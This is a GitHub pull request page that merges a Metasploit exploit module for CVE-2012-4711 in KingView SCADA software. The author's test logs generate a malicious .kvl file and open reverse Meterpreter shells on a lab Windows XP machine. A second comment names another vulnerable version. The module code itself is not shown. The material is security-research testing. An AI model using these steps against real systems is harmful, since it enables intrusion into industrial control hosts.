Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added module for CVE-2012-4711 #1588

Merged
merged 5 commits into from Mar 22, 2013

Conversation

jvazquez-r7
Copy link
Contributor

  • With kingview 6.52 English as downloaded from:

http://www.kingview.com/download/index.aspx (Registration required)

MD5 (kingview6.52_63.5MB.rar) = 1c069edc716d24d779bcb94a5f43d58c

Test:


msf  exploit(handler) > use exploit/windows/fileformat/kingview_kingmess_kvl 
msf  exploit(kingview_kingmess_kvl) > rexploit
[*] Reloading module...

[+] msf.kvl stored at /Users/juan/.msf4/local/msf.kvl
msf  exploit(kingview_kingmess_kvl) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.134
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.134:1042) at 2013-03-13 19:59:46 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.134 - Meterpreter session 1 closed.  Reason: User exit

@jvazquez-r7
Copy link
Contributor Author

Definitely seems like the 6.53 free trial downloadable from:

http://www.wellintech.com/documents/KingView6.53_EN.zip

is also vulnerable, please check Kingmess.exe 65.20.2003.10300 is installed :)

Hope it helps with testing!

msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.134
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.134:1040) at 2013-03-13 20:36:15 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

@wchen-r7 wchen-r7 merged commit 456e444 into rapid7:master Mar 22, 2013
@jvazquez-r7 jvazquez-r7 deleted the kingview_kingmess_kvl branch November 18, 2014 15:51
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants